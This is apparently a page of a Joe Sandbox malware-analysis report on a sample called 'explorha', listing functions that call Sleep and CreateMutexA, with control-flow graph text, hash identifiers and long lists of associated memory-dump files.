                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a8b893d2e8a0c0a49730fec41c7ec6ebdda12a0daa0bad2acda6036ba12fd547
                                                                                                      • Instruction ID: 4e0fc406ff319fe4975bd0e1188d844d638b3b18518c52e6dc8ddf88a22c488c
                                                                                                      • Opcode Fuzzy Hash: a8b893d2e8a0c0a49730fec41c7ec6ebdda12a0daa0bad2acda6036ba12fd547
                                                                                                      • Instruction Fuzzy Hash: 023144727101048BEF0CDB78DD88BACBBB6FB85314F208619E454EB3D9DB7599808B56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869EE8 Relevance: 3.1, APIs: 2, Instructions: 124sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 115 869ee8-869f08 119 869f36-869f52 115->119 120 869f0a-869f16 115->120 121 869f54-869f60 119->121 122 869f80-869f9f 119->122 123 869f2c-869f33 call 87ecf8 120->123 124 869f18-869f26 120->124 125 869f76-869f7d call 87ecf8 121->125 126 869f62-869f70 121->126 127 869fa1-869fad 122->127 128 869fcd-86a3e6 call 879750 122->128 123->119 124->123 129 86a40f 124->129 125->122 126->125 126->129 135 869fc3-869fca call 87ecf8 127->135 136 869faf-869fbd 127->136 131 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 129->131 132 86a40f call 8982fa 129->132 132->131 135->128 136->129 136->135
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: de710d050f78dfe794d047b7b3ff9baec0459cd286aaf0de80fae3a183247d98
                                                                                                      • Instruction ID: 0ad404bc4543e5c068a6a427559b17c547d27154199ed290097efa6fdc9247d0
                                                                                                      • Opcode Fuzzy Hash: de710d050f78dfe794d047b7b3ff9baec0459cd286aaf0de80fae3a183247d98
                                                                                                      • Instruction Fuzzy Hash: 763146716001048BEF08EB7CCD89B9DB676FF86314F248218E055EB3D9DFB599808B56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A01D Relevance: 3.1, APIs: 2, Instructions: 123sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 152 86a01d-86a03d 156 86a03f-86a04b 152->156 157 86a06b-86a087 152->157 158 86a061-86a068 call 87ecf8 156->158 159 86a04d-86a05b 156->159 160 86a0b5-86a0d4 157->160 161 86a089-86a095 157->161 158->157 159->158 164 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 159->164 162 86a0d6-86a0e2 160->162 163 86a102-86a3e6 call 879750 160->163 166 86a097-86a0a5 161->166 167 86a0ab-86a0b2 call 87ecf8 161->167 168 86a0e4-86a0f2 162->168 169 86a0f8-86a0ff call 87ecf8 162->169 166->164 166->167 167->160 168->164 168->169 169->163
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: df7b399585a17ceea5e470be92d62c19f4be167af0c51ebc290c6905c84de248
                                                                                                      • Instruction ID: ffb7332943a259641de72eb6c554cbd73de3a497f7f43cac9f4b4f6f2be031d9
                                                                                                      • Opcode Fuzzy Hash: df7b399585a17ceea5e470be92d62c19f4be167af0c51ebc290c6905c84de248
                                                                                                      • Instruction Fuzzy Hash: 0B312871600504DBEB0CDB6CCD89B6DB672FB86318F248218E415FB3D6CB7599808B63
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086A152 Relevance: 3.1, APIs: 2, Instructions: 122sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 187 86a152-86a172 191 86a174-86a180 187->191 192 86a1a0-86a1bc 187->192 193 86a196-86a19d call 87ecf8 191->193 194 86a182-86a190 191->194 195 86a1be-86a1ca 192->195 196 86a1ea-86a209 192->196 193->192 194->193 199 86a419-86a466 call 8982fa * 2 Sleep CreateMutexA 194->199 201 86a1e0-86a1e7 call 87ecf8 195->201 202 86a1cc-86a1da 195->202 197 86a237-86a3e6 call 879750 196->197 198 86a20b-86a217 196->198 204 86a22d-86a234 call 87ecf8 198->204 205 86a219-86a227 198->205 201->196 202->199 202->201 204->197 205->199 205->204
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 2936c80cb5cba65236a074a3d4edef6fb1adcddcf3bce10a5cb48c3853092fa1
                                                                                                      • Instruction ID: 59363cc3ec6895f5d18eb4e10bbd4bedd126748c5468bcd0dd37cb5456d6bb74
                                                                                                      • Opcode Fuzzy Hash: 2936c80cb5cba65236a074a3d4edef6fb1adcddcf3bce10a5cb48c3853092fa1
                                                                                                      • Instruction Fuzzy Hash: 163148716001088BEF0CDB6CDD89B6DB772FB86314F248218E425FB3D6CB7599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 008695B9 Relevance: 3.1, APIs: 2, Instructions: 95sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
